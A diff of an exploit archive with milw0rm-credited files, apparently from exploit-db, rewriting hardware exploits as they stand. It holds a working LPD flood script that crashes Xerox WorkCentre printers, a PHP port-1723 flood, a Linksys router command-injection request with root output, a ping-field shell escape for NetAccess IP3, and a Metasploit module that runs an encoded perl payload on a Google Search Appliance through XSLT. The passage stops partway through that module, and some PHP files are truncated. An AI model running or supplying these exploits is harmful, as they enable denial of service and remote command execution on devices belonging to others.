+ request = "GET " + buff + " HTTP/1.0"
+ connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ connection.connect((host, port))
+ connection.send(request)
+ raw_input('\n\nExploit completed. Press "Enter" to quit...')
+ sys.exit
+except:
+ raw_input('\n\nUnable to connect. Press "Enter" to quit...')
+
+# milw0rm.com [2009-07-01]
diff --git a/platforms/hardware/dos/9514.py b/platforms/hardware/dos/9514.py
index 49c31a11e..665c56569 100755
--- a/platforms/hardware/dos/9514.py
+++ b/platforms/hardware/dos/9514.py
@@ -1,183 +1,183 @@
-# Louhi Networks Information Security Research
-# Security Advisory
-#
-#
-# Advisory: Xerox WorkCentre multiple models Denial of Service
-# Release Date: 2009/08/25
-# Last Modified: 2009/08/25
-# Authors: Juho Ranta
-# [juho.ranta@louhi.fi]
-# Henri Lindberg, CISA
-# [henri.lindberg@louhi.fi]
-#
-# Application: Xerox WorkCentre
-# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5
-# Devices: Xerox WorkCentre 7132,
-# WC7232/7242, WC7328/7335/7345/7346 and
-# WC7425/28/35
-# Attack type: Denial of Service
-# Risk: Low
-# Vendor Status: Patch available for WC7232/7242
-# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt
-#
-# http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html
-#
-# http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA
-#
-#
-# Overview
-#
-# Quote from http://www.xerox.com/
-# "The Xerox WorkCentre 7132 multifunction is the affordable transition
-# to the next level of productivity for your office. One easy-to-use
-# device offers powerful printing, copying, scanning, and faxing. The
-# WorkCentre 7132 also gives you color when you need it, for critical
-# documents and for added impact. Robust functions, straightforward
-# operation, and color within your budget . that should keep everyone
-# smiling and productive."
-#
-# During a brief assessment performed for Xerox WorkCentre 7132 it was
-# discovered that LPD daemon implementation contains a weakness
-# related to robustness of LPD protocol handling. Attacker can crash
-# the whole device with a relatively simple attack. Recovering from
-# the denial-of-service condition requires power cycling the device.
-#
-# Details
-#
-# Device freezes when it is flooded with LPD requests having oversized
-# queue name length AND other features of the device are accessed
-# during the attack.
-#
-# The LPD daemon terminates the connection when it receives a request
-# with an oversized queue name. The required minimum length for this
-# seems to vary. Our proof-of-concept attack sends ASCII character
-# blocks to the LPD daemon until connection is closed, while sending
-# HTTP requests to the web administration interface.
-#
-# By flooding the device with these invalid LPD requests and accessing
-# other features at the same time, the device can be crashed. This was
-# verified with two different firmware versions (1.202.1 and 1.202.5).
-#
-# It must be noted that successful denial-of-service attack requires
-# the steps described above. Sending requests with oversized queue
-# names does crash the device by itself.
-#
-# Due to the black box nature of the performed attack against a
-# production device, we were not able to determine the exact root
-# cause for the crash. According to vendor this is caused by a memory
-# leak, but further exploitability or memory corruption has neither
-# been confirmed nor denied.
-#
-# Vulnerability was detected with an LPD protocol implementation
-# written for Sulley Fuzzing Framework.
-#
-#
-# Preconditions
-#
-# *LPD daemon is enabled.
-# *Attacker has network access to the LPD daemon
-# *Attacker has network access to other features OR
-# *Valid user uses the device on location
-#
-#
-# Symptoms of successful attack
-#
-# One or more of the following:
-# *Control panel lights are blinking, no response to pushing buttons
-# *LCD panel displays error message
-# *LCD panel displays a halted progress bar
-# *Switching power off from on/off button takes more than 10 seconds
-#
-# Proof of Concept:
-#
-# Python code available at:
-# http://www.louhinetworks.fi/advisory/xerox/exploit.py
-# http://www.louhinetworks.fi/advisory/xerox/webInterface.py
-#
-# Pictures of a crashed control panel (Finnish language):
-# http://www.louhinetworks.fi/advisory/xerox/error1.jpg
-# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg
-#
-# Web interface requests are performed with a separate Python
-# process/script in order to achieve more reliable exploitation under
-# Windows.
-#
-# Mitigation:
-#
-# Preventive
-# *Install patch from vendor
-# *Configure IPS signature for LPD requests with oversized queue
-# names
-# *Allow only trusted users to access LPD daemon
-# *Disable LPD daemon
-#
-# Detective
-# *Configure IDS signature for LPD requests with oversized queue
-# names
-#
-# Disclosure Timeline (selected dates):
-#
-# X 2008 - Vulnerability discovered
-# 3. September 2008 - Contacted CERT-FI by email describing the
-# issue with Xerox WC 7132
-# 20. November 2008 - CERT-FI confirms vendor has been notified
-# 21. January 2009 - Vendor is unable to reproduce the issue,
-# but continues trying
-# 22. January 2009 - Vulnerability reproduced, vendor investigates
-# other devices. Apologizes slow response.
-# 17. June 2009 - Vendor has identified vulnerable devices,
-# patch due in July.
-# 20. August 2009 - Patch available for download (only
-# WC7232/7242)
-# 25. August 2009 - Advisory released
-#
-# A Big Thank You to CERT-FI's Vulnerability Coordination for persistent
-# coordination effort.
-#
-# Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
-# no liabilities, information provided 'as is' for educational purposes.
-# Reproduction allowed as long as credit is given. Information wants to
-# be free.
-
-import socket
-import sys
-import os
-import httplib
-import signal
-
-if len(sys.argv) < 2:
- print("Usage: python exploit.py printerIpAddress")
- print("After the script is started, execute the webInterface.py script")
- sys.exit(0)
-
-ipAddress = sys.argv[1]
-
-
-i = 0
-
-while True:
- i += 1
- try:
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect((ipAddress, 515))
-
- except:
- # If the connection fails, printer has crashed
- print("Unable to connect")
- sys.exit(0)
-
- # Send receive a printer job -command. Queue name will be as long as
- # possible. The printer will disconnect when the queue name has reached it's
- # maximum length
- s.send("\x02")
- j = 0
- while True:
- j += 1
- s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
- print(str(i) + "." + str(j))
-
- s.close()
-
- print(i)
-
-# milw0rm.com [2009-08-25]
+# Louhi Networks Information Security Research
+# Security Advisory
+#
+#
+# Advisory: Xerox WorkCentre multiple models Denial of Service
+# Release Date: 2009/08/25
+# Last Modified: 2009/08/25
+# Authors: Juho Ranta
+# [juho.ranta@louhi.fi]
+# Henri Lindberg, CISA
+# [henri.lindberg@louhi.fi]
+#
+# Application: Xerox WorkCentre
+# Verified: Controller+PS ROM Version 1.202.1 and 1.202.5
+# Devices: Xerox WorkCentre 7132,
+# WC7232/7242, WC7328/7335/7345/7346 and
+# WC7425/28/35
+# Attack type: Denial of Service
+# Risk: Low
+# Vendor Status: Patch available for WC7232/7242
+# References: http://www.louhinetworks.fi/advisory/xerox_0908.txt
+#
+# http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html
+#
+# http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA
+#
+#
+# Overview
+#
+# Quote from http://www.xerox.com/
+# "The Xerox WorkCentre 7132 multifunction is the affordable transition
+# to the next level of productivity for your office. One easy-to-use
+# device offers powerful printing, copying, scanning, and faxing. The
+# WorkCentre 7132 also gives you color when you need it, for critical
+# documents and for added impact. Robust functions, straightforward
+# operation, and color within your budget . that should keep everyone
+# smiling and productive."
+#
+# During a brief assessment performed for Xerox WorkCentre 7132 it was
+# discovered that LPD daemon implementation contains a weakness
+# related to robustness of LPD protocol handling. Attacker can crash
+# the whole device with a relatively simple attack. Recovering from
+# the denial-of-service condition requires power cycling the device.
+#
+# Details
+#
+# Device freezes when it is flooded with LPD requests having oversized
+# queue name length AND other features of the device are accessed
+# during the attack.
+#
+# The LPD daemon terminates the connection when it receives a request
+# with an oversized queue name. The required minimum length for this
+# seems to vary. Our proof-of-concept attack sends ASCII character
+# blocks to the LPD daemon until connection is closed, while sending
+# HTTP requests to the web administration interface.
+#
+# By flooding the device with these invalid LPD requests and accessing
+# other features at the same time, the device can be crashed. This was
+# verified with two different firmware versions (1.202.1 and 1.202.5).
+#
+# It must be noted that successful denial-of-service attack requires
+# the steps described above. Sending requests with oversized queue
+# names does crash the device by itself.
+#
+# Due to the black box nature of the performed attack against a
+# production device, we were not able to determine the exact root
+# cause for the crash. According to vendor this is caused by a memory
+# leak, but further exploitability or memory corruption has neither
+# been confirmed nor denied.
+#
+# Vulnerability was detected with an LPD protocol implementation
+# written for Sulley Fuzzing Framework.
+#
+#
+# Preconditions
+#
+# *LPD daemon is enabled.
+# *Attacker has network access to the LPD daemon
+# *Attacker has network access to other features OR
+# *Valid user uses the device on location
+#
+#
+# Symptoms of successful attack
+#
+# One or more of the following:
+# *Control panel lights are blinking, no response to pushing buttons
+# *LCD panel displays error message
+# *LCD panel displays a halted progress bar
+# *Switching power off from on/off button takes more than 10 seconds
+#
+# Proof of Concept:
+#
+# Python code available at:
+# http://www.louhinetworks.fi/advisory/xerox/exploit.py
+# http://www.louhinetworks.fi/advisory/xerox/webInterface.py
+#
+# Pictures of a crashed control panel (Finnish language):
+# http://www.louhinetworks.fi/advisory/xerox/error1.jpg
+# http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg
+#
+# Web interface requests are performed with a separate Python
+# process/script in order to achieve more reliable exploitation under
+# Windows.
+#
+# Mitigation:
+#
+# Preventive
+# *Install patch from vendor
+# *Configure IPS signature for LPD requests with oversized queue
+# names
+# *Allow only trusted users to access LPD daemon
+# *Disable LPD daemon
+#
+# Detective
+# *Configure IDS signature for LPD requests with oversized queue
+# names
+#
+# Disclosure Timeline (selected dates):
+#
+# X 2008 - Vulnerability discovered
+# 3. September 2008 - Contacted CERT-FI by email describing the
+# issue with Xerox WC 7132
+# 20. November 2008 - CERT-FI confirms vendor has been notified
+# 21. January 2009 - Vendor is unable to reproduce the issue,
+# but continues trying
+# 22. January 2009 - Vulnerability reproduced, vendor investigates
+# other devices. Apologizes slow response.
+# 17. June 2009 - Vendor has identified vulnerable devices,
+# patch due in July.
+# 20. August 2009 - Patch available for download (only
+# WC7232/7242)
+# 25. August 2009 - Advisory released
+#
+# A Big Thank You to CERT-FI's Vulnerability Coordination for persistent
+# coordination effort.
+#
+# Copyright 2009 Louhi Networks Oy. All rights reserved. No warranties,
+# no liabilities, information provided 'as is' for educational purposes.
+# Reproduction allowed as long as credit is given. Information wants to
+# be free.
+
+import socket
+import sys
+import os
+import httplib
+import signal
+
+if len(sys.argv) < 2:
+ print("Usage: python exploit.py printerIpAddress")
+ print("After the script is started, execute the webInterface.py script")
+ sys.exit(0)
+
+ipAddress = sys.argv[1]
+
+
+i = 0
+
+while True:
+ i += 1
+ try:
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((ipAddress, 515))
+
+ except:
+ # If the connection fails, printer has crashed
+ print("Unable to connect")
+ sys.exit(0)
+
+ # Send receive a printer job -command. Queue name will be as long as
+ # possible. The printer will disconnect when the queue name has reached it's
+ # maximum length
+ s.send("\x02")
+ j = 0
+ while True:
+ j += 1
+ s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
+ print(str(i) + "." + str(j))
+
+ s.close()
+
+ print(i)
+
+# milw0rm.com [2009-08-25]
diff --git a/platforms/hardware/dos/9646.php b/platforms/hardware/dos/9646.php
index 4940c58c4..19c0f9047 100755
--- a/platforms/hardware/dos/9646.php
+++ b/platforms/hardware/dos/9646.php
@@ -1,22 +1,22 @@
-Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. -It takes a few bytes for the AP to automatically restart - -\n"; -} else { - $trash = str_repeat("\x90","261"); - fwrite($con, $trash); - while (!feof($con)) { - echo "$trash \r\n"; - } - fclose($con); -} -?> - -# milw0rm.com [2009-09-11] +Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP. +It takes a few bytes for the AP to automatically restart + +\n"; +} else { + $trash = str_repeat("\x90","261"); + fwrite($con, $trash); + while (!feof($con)) { + echo "$trash \r\n"; + } + fclose($con); +} +?> + +# milw0rm.com [2009-09-11]
diff --git a/platforms/hardware/dos/9666.php b/platforms/hardware/dos/9666.php
index d92f0763c..6f5620e9d 100755
--- a/platforms/hardware/dos/9666.php
+++ b/platforms/hardware/dos/9666.php
@@ -1,19 +1,19 @@
-# Apple Safari Iphone Crash using tel: -# Found by cloud : cloud[at]madpowah[dot]org -# http://blog.madpowah.org - -# Tested on Iphone 3G, OS 3.0.1 -# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear - -# Exploit: - -'; -?> - -# milw0rm.com [2009-09-14] +# Apple Safari Iphone Crash using tel: +# Found by cloud : cloud[at]madpowah[dot]org +# http://blog.madpowah.org + +# Tested on Iphone 3G, OS 3.0.1 +# Launch Safari, enter the page and after a few seconds Safari will crash and black screen will appear + +# Exploit: + +'; +?> + +# milw0rm.com [2009-09-14]
diff --git a/platforms/hardware/local/8833.txt b/platforms/hardware/local/8833.txt
index e1fdbc76c..56fb44286 100755
--- a/platforms/hardware/local/8833.txt
+++ b/platforms/hardware/local/8833.txt
@@ -1,31 +1,31 @@
-1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.
-
-2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10).
-
-3. PoC:
-
-GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
-Host: 192.168.1.1
-Authorization: Basic YWRtaW46YWRtaW4=
-
-HTTP/1.0 200 OK
-sh: cannot create 1: Unknown error 30
-killall: pingmultilang: no process killed
-killall: 2: no process killed
- PID Uid VmSize Stat Command
- 1 root 284 S init
- 2 root SWN [ksoftirqd/0]
- 3 root SW< [events/0]
- 4 root SW< [khelper]
- 5 root SW< [kthread]
-...
-
-4. Note that it is needed to supply valid user/password (Authorization HTTP header).
-
-5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management.
-
-6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched).
-
-7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
-
-# milw0rm.com [2009-06-01]
+1. Linksys WAG54G2 router is a popular SOHO class device. It provides ADSL / WiFi / Ethernet interfaces.
+
+2. When logged into web management console, it is possible to execute commands as root (tested on firmware: V1.00.10).
+
+3. PoC:
+
+GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
+Host: 192.168.1.1
+Authorization: Basic YWRtaW46YWRtaW4=
+
+HTTP/1.0 200 OK
+sh: cannot create 1: Unknown error 30
+killall: pingmultilang: no process killed
+killall: 2: no process killed
+ PID Uid VmSize Stat Command
+ 1 root 284 S init
+ 2 root SWN [ksoftirqd/0]
+ 3 root SW< [events/0]
+ 4 root SW< [khelper]
+ 5 root SW< [kthread]
+...
+
+4. Note that it is needed to supply valid user/password (Authorization HTTP header).
+
+5. One could try to exploit this issue remotely (using CRSF) assuming that a victim did not change default password to the web management.
+
+6. The vendor (Cisco) was contacted in march '09 and confirmed the issue (but still it remains unpatched).
+
+7. More detailed information: http://www.securitum.pl/dh/Linksys_WAG54G2_-_escape_to_OS_root
+
+# milw0rm.com [2009-06-01]
diff --git a/platforms/hardware/local/9688.txt b/platforms/hardware/local/9688.txt
index 0e0cd7846..1a258070e 100755
--- a/platforms/hardware/local/9688.txt
+++ b/platforms/hardware/local/9688.txt
@@ -1,31 +1,31 @@
-###############################################################
-#NetAccess IP3 - Force into shell
-#By: r00t
-#Shouts: G., Tee, ES, s1ngl3, and D1g1t5
-#
-###############################################################
-#Requirements: Remote access to an IP3
-# Any level control panel username/password
-#
-###############################################################
-#Vendor Information:
-#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)
-#for including vendor information in his AFD vuln
-#
-#"IP3's NetAccess is a device created for high demand environments such as
-#convention centers or hotels. It handles the Internet access and
-#provides for instance firewalling, billing, rate-limiting as well as
-#various authentication mechanisms. The device is administrated via SSH
-#or a web-based GUI."
-#
-###############################################################
-
-1. SSH into the IP3's IP address
-2. After logging in, select the "ping" option (usually menu item 5)
-3. Ping the address: localhost && sh
-4. After four pings to localhost, shell will be forced open
-
-One may think there are limitations once logged into shell without
-root access on an IP3. Wrong.
-
-# milw0rm.com [2009-09-15]
+###############################################################
+#NetAccess IP3 - Force into shell
+#By: r00t
+#Shouts: G., Tee, ES, s1ngl3, and D1g1t5
+#
+###############################################################
+#Requirements: Remote access to an IP3
+# Any level control panel username/password
+#
+###############################################################
+#Vendor Information:
+#Thanks to Sebastian Wolfgarten (sebastian at wolfgarten dot com)
+#for including vendor information in his AFD vuln
+#
+#"IP3's NetAccess is a device created for high demand environments such as
+#convention centers or hotels. It handles the Internet access and
+#provides for instance firewalling, billing, rate-limiting as well as
+#various authentication mechanisms. The device is administrated via SSH
+#or a web-based GUI."
+#
+###############################################################
+
+1. SSH into the IP3's IP address
+2. After logging in, select the "ping" option (usually menu item 5)
+3. Ping the address: localhost && sh
+4. After four pings to localhost, shell will be forced open
+
+One may think there are limitations once logged into shell without
+root access on an IP3. Wrong.
+
+# milw0rm.com [2009-09-15]
diff --git a/platforms/hardware/remote/1333.pm b/platforms/hardware/remote/1333.pm
index ba45db92d..f64b4b025 100755
--- a/platforms/hardware/remote/1333.pm
+++ b/platforms/hardware/remote/1333.pm
@@ -1,256 +1,256 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::google_proxystylesheet_exec;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket;
-use IO::Select;
-my $advanced = { };
-
-my $info =
-{
- 'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
- 'Version' => '$Revision: 1.1 $',
- 'Authors' => [ 'H D Moore ' ],
-
- 'Description' =>
- Pex::Text::Freeform(qq{
- This module exploits a feature in the Saxon XSLT parser used by
- the Google Search Appliance. This feature allows for arbitrary
- java methods to be called. Google released a patch and advisory to
- their client base in August of 2005 (GA-2005-08-m). The target appliance
- must be able to connect back to your machine for this exploit to work.
- }),
-
- 'Arch' => [ ],
- 'OS' => [ ],
- 'Priv' => 0,
- 'UserOpts' =>
- {
- 'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
- 'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
- 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
- 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
- 'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
- },
- 'Payload' =>
- {
- 'Space' => 1024,
- 'Keys' => [ 'cmd' ],
- },
- 'Refs' =>
- [
- ['OSVDB', 20981],
- ],
- 'DefaultTarget' => 0,
- 'Targets' =>
- [
- [ 'Google Search Appliance']
- ],
- 'Keys' => [ 'google' ],
-
- 'DisclosureDate' => 'Aug 16 2005',
-};
-
-sub new
-{
- my $class = shift;
- my $self;
-
- $self = $class->SUPER::new(
- {
- 'Info' => $info,
- 'Advanced' => $advanced,
- },
- @_);
-
- return $self;
-}
-
-sub Check {
- my $self = shift;
- my $s = $self->ConnectSearch;
-
- if (! $s) {
- return $self->CheckCode('Connect');
- }
-
- my $url =
- "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
- "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
- "output=xml_no_dtd&".
- "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
- "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
-
- $s->Send("GET $url HTTP/1.0\r\n\r\n");
- my $page = $s->Recv(-1, 5);
- $s->Close;
-
- if ($page =~ /cannot be resolved to an ip address/) {
- $self->PrintLine("[*] This system appears to be vulnerable >:-)");
- return $self->CheckCode('Confirmed');
- }
-
- if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
- $self->PrintLine("[*] This system appears to be patched");
- }
-
- $self->PrintLine("[*] This system does not appear to be vulnerable");
- return $self->CheckCode('Safe');
-}
-
-
-sub Exploit
-{
- my $self = shift;
- my ($s, $page);
-
- # Request the index page to obtain a redirect response
- $s = $self->ConnectSearch || return;
- $s->Send("GET / HTTP/1.0\r\n\r\n");
- $page = $s->Recv(-1, 5);
- $s->Close;
-
- # Parse the redirect to get the client and site values
- my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
- if (! $goog_site || ! $goog_clnt) {
- $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
- #$self->PrintLine($page);
- #!!! return;
- $goog_site = 'test';
- $goog_clnt = 'test';
- }
-
- # Create the listening local socket that will act as our HTTP server
- my $lis = IO::Socket::INET->new(
- LocalHost => $self->GetVar('HTTPHOST'),
- LocalPort => $self->GetVar('HTTPPORT'),
- ReuseAddr => 1,
- Listen => 1,
- Proto => 'tcp');
-
- if (not defined($lis)) {
- $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
- return;
- }
- my $sel = IO::Select->new($lis);
-
- # Send a search request with our own address in the proxystylesheet parameter
- my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
-
- my $proxy =
- "http://".
- ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
- ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
-
- my $url =
- "/search?client=". $goog_clnt ."&site=". $goog_site .
- "&output=xml_no_dtd&proxystylesheet=". $proxy .
- "&q=". $query ."&proxyreload=1";
-
- $self->PrintLine("[*] Sending our malicious search request...");
- $s = $self->ConnectSearch || return;
- $s->Send("GET $url HTTP/1.0\r\n\r\n");
- $page = $s->Recv(-1, 3);
- $s->Close;
-
- $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
-
- # Did we receive a connection?
- my @r = $sel->can_read(30);
-
- if (! @r) {
- $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
- $lis->close;
- return;
- }
-
- my $c = $lis->accept();
- if (! $c) {
- $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
- $lis->close;
- return;
- }
-
- my $cli = Msf::Socket::Tcp->new_from_socket($c);
- $self->PrintLine("[*] Connection received from ".$cli->PeerAddr."...");
- $self->ProcessHTTP($cli);
- return;
-}
-
-sub ConnectSearch {
- my $self = shift;
- my $s = Msf::Socket::Tcp->new(
- 'PeerAddr' => $self->GetVar('RHOST'),
- 'PeerPort' => $self->GetVar('RPORT'),
- 'SSL' => $self->GetVar('SSL')
- );
-
- if ($s->IsError) {
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return;
- }
- return $s;
-}
-
-sub ProcessHTTP
-{
- my $self = shift;
- my $cli = shift;
- my $targetIdx = $self->GetVar('TARGET');
- my $target = $self->Targets->[$targetIdx];
- my $ret = $target->[1];
- my $shellcode = $self->GetVar('EncodedPayload')->Payload;
- my $content;
- my $rhost;
- my $rport;
-
- # Read the first line of the HTTP request
- my ($cmd, $url, $proto) = split(/ /, $cli->RecvLine(10));
-
- # The way we call Runtime.getRuntime().exec, Java will split
- # our string on whitespace. Since we are injecting via XSLT,
- # inserting quotes becomes a huge pain, so we do this...
- my $exec_str =
- '/usr/bin/perl -e system(pack(qq{H*},qq{' .
- unpack("H*", $self->GetVar('EncodedPayload')->RawPayload).
- '}))';
-
- # Load the template from our data section, we have to manually
- # seek and reposition to allow the exploit to be used more
- # than once without a reload.
- seek(DATA, 0, 0);
- while() { last if /^__DATA__$/ }
- while() { $content .= $_ }
-
- # Insert our command line
- $content =~ s/:x:MSF:x:/$exec_str/;
-
- # Send it to the requesting appliance
- $rport = $cli->PeerPort;
- $rhost = $cli->PeerAddr;
- $self->PrintLine("[*] HTTP Client connected from $rhost, sending XSLT...");
-
- my $res = "HTTP/1.1 200 OK\r\n" .
- "Content-Type: text/html\r\n" .
- "Content-Length: " . length($content) . "\r\n" .
- "Connection: close\r\n" .
- "\r\n" .
- $content;
-
- $self->PrintLine("[*] Sending ".length($res)." bytes...");
- $cli->Send($res);
- $cli->Close;
-}
-
-1;
-
-# milw0rm.com [2005-11-20]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::google_proxystylesheet_exec;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket;
+use IO::Select;
+my $advanced = { };
+
+my $info =
+{
+ 'Name' => 'Google Appliance ProxyStyleSheet Command Execution',
+ 'Version' => '$Revision: 1.1 $',
+ 'Authors' => [ 'H D Moore ' ],
+
+ 'Description' =>
+ Pex::Text::Freeform(qq{
+ This module exploits a feature in the Saxon XSLT parser used by
+ the Google Search Appliance. This feature allows for arbitrary
+ java methods to be called. Google released a patch and advisory to
+ their client base in August of 2005 (GA-2005-08-m). The target appliance
+ must be able to connect back to your machine for this exploit to work.
+ }),
+
+ 'Arch' => [ ],
+ 'OS' => [ ],
+ 'Priv' => 0,
+ 'UserOpts' =>
+ {
+ 'RHOST' => [ 1, 'HOST', 'The address of the Google appliance'],
+ 'RPORT' => [ 1, 'PORT', 'The port used by the search interface', 80],
+ 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],
+ 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+ 'HTTPADDR' => [ 0, 'HOST', 'The address that can be used to connect back to this system'],
+ },
+ 'Payload' =>
+ {
+ 'Space' => 1024,
+ 'Keys' => [ 'cmd' ],
+ },
+ 'Refs' =>
+ [
+ ['OSVDB', 20981],
+ ],
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ [ 'Google Search Appliance']
+ ],
+ 'Keys' => [ 'google' ],
+
+ 'DisclosureDate' => 'Aug 16 2005',
+};
+
+sub new
+{
+ my $class = shift;
+ my $self;
+
+ $self = $class->SUPER::new(
+ {
+ 'Info' => $info,
+ 'Advanced' => $advanced,
+ },
+ @_);
+
+ return $self;
+}
+
+sub Check {
+ my $self = shift;
+ my $s = $self->ConnectSearch;
+
+ if (! $s) {
+ return $self->CheckCode('Connect');
+ }
+
+ my $url =
+ "/search?client=". Pex::Text::AlphaNumText(int(rand(15))+1). "&".
+ "site=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
+ "output=xml_no_dtd&".
+ "q=".Pex::Text::AlphaNumText(int(rand(15))+1)."&".
+ "proxystylesheet=http://".Pex::Text::AlphaNumText(int(rand(32))+1)."/";
+
+ $s->Send("GET $url HTTP/1.0\r\n\r\n");
+ my $page = $s->Recv(-1, 5);
+ $s->Close;
+
+ if ($page =~ /cannot be resolved to an ip address/) {
+ $self->PrintLine("[*] This system appears to be vulnerable >:-)");
+ return $self->CheckCode('Confirmed');
+ }
+
+ if ($page =~ /ERROR: Unable to fetch the stylesheet/) {
+ $self->PrintLine("[*] This system appears to be patched");
+ }
+
+ $self->PrintLine("[*] This system does not appear to be vulnerable");
+ return $self->CheckCode('Safe');
+}
+
+
+sub Exploit
+{
+ my $self = shift;
+ my ($s, $page);
+
+ # Request the index page to obtain a redirect response
+ $s = $self->ConnectSearch || return;
+ $s->Send("GET / HTTP/1.0\r\n\r\n");
+ $page = $s->Recv(-1, 5);
+ $s->Close;
+
+ # Parse the redirect to get the client and site values
+ my ($goog_site, $goog_clnt) = $page =~ m/^location.*site=([^\&]+)\&.*client=([^\&]+)\&/im;
+ if (! $goog_site || ! $goog_clnt) {
+ $self->PrintLine("[*] Invalid response to our request, is this a Google appliance?");
+ #$self->PrintLine($page);
+ #!!! return;
+ $goog_site = 'test';
+ $goog_clnt = 'test';
+ }
+
+ # Create the listening local socket that will act as our HTTP server
+ my $lis = IO::Socket::INET->new(
+ LocalHost => $self->GetVar('HTTPHOST'),
+ LocalPort => $self->GetVar('HTTPPORT'),
+ ReuseAddr => 1,
+ Listen => 1,
+ Proto => 'tcp');
+
+ if (not defined($lis)) {
+ $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+ return;
+ }
+ my $sel = IO::Select->new($lis);
+
+ # Send a search request with our own address in the proxystylesheet parameter
+ my $query = Pex::Text::AlphaNumText(int(rand(32))+1);
+
+ my $proxy =
+ "http://".
+ ($self->GetVar('HTTPADDR') || Pex::Utils::SourceIP($self->GetVar('RHOST'))).
+ ":".$self->GetVar('HTTPPORT')."/".Pex::Text::AlphaNumText(int(rand(15))+1).".xsl";
+
+ my $url =
+ "/search?client=". $goog_clnt ."&site=". $goog_site .
+ "&output=xml_no_dtd&proxystylesheet=". $proxy .
+ "&q=". $query ."&proxyreload=1";
+
+ $self->PrintLine("[*] Sending our malicious search request...");
+ $s = $self->ConnectSearch || return;
+ $s->Send("GET $url HTTP/1.0\r\n\r\n");
+ $page = $s->Recv(-1, 3);
+ $s->Close;
+
+ $self->PrintLine("[*] Listening for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
+
+ # Did we receive a connection?
+ my @r = $sel->can_read(30);
+
+ if (! @r) {
+ $self->PrintLine("[*] No connection received from the search engine, possibly patched.");
+ $lis->close;
+ return;
+ }
+
